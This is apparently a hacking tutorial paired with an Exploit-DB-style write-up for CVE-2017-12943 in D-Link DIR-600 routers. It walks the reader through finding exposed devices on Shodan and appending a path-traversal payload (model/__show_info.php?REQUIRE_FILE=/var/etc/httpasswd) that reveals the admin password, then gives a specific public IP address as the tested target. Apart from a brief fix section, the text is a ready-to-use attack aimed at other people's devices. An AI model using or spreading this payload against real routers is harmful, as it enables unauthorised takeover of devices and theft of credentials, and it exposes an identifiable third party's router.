D-Link DIR-600 - Authentication Bypass (Absolute Path Traversal Attack)

Hello All,

In this tutorial i will explain How to get Username & Password of D-link router 600 - Directory Traversal Attack

Type: Webapps

Platform: Hardware

Choose any vulnerable (2.01,B1) router, browse www.shodan.io to explore all the Online devices (Register and login an Shodan account in order to unlock the advanced search features)

Search for D-Link DIR-600 router

Choose any router you want  and proceed to the login page

The hack is so simple, it requires no additional tools other your browser and quick copy-n-paste. Attacker is only required to do enter the following payload to get the user's creds : model/__show_info.php?REQUIRE_FILE=/var/etc/httpasswd

eg: http://targetIP:8080/model/__show_info.php?REQUIRE_FILE=/var/etc/httpasswd

if you set the traget device then you’re good to go.

Now you will see the login credential shown in plain text. Next, you may use the Login ID and Password to access the router.

if you need to exploit online, the target router must enable remote access. The password file must listed/located in the correct path which is /var/etc/httpasswd

Fix & Countermesure:

Turn off the router remote access feature if you are not using. Upgrade your router firmware.

For More Video POC & Exploit DB write up is below :)

# Exploit Title: D-Link DIR-600  - Authentication Bypass (Absolute Path Traversal Attack) # CVE - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12943 # Date: 29-08-2017 # Exploit Author: Jithin D Kurup # Contact : https://in.linkedin.com/in/jithin-d-kurup-77b616142 # Vendor : www.dlink.com # Version: Hardware version: B1 # Firmware version: 2.01 # Tested on:All Platforms

1) Description

After Successfully Connected to D-Link DIR-600 Router(FirmWare Version : 2.01), Any User Can Easily Bypass The Router's Admin Panel Just by adding a simple payload into URL.

D-Link DIR-600 Rev Bx devices with v2.x firmware allow remote attackers to read passwords via a model/__show_info.php?REQUIRE_FILE= absolute path traversal attack, as demonstrated by discovering the admin password.

Its More Dangerous when your Router has a public IP with remote login enabled.

IN MY CASE, Tested Router IP : http://190.164.170.249

Video POC : https://www.youtube.com/watch?v=PeNOJORAQsQ

2) Proof of Concept

Step 1: Go to Router Login Page : http://190.164.170.249:8080

Step 2: Add the payload to URL.

Payload: model/__show_info.php?REQUIRE_FILE=%2Fvar%2Fetc%2Fhttpasswd

Bingooo You got admin Access on router. Now you can download/upload settings , Change settings etc.

################################## Credits goes to: tytusromekiatomek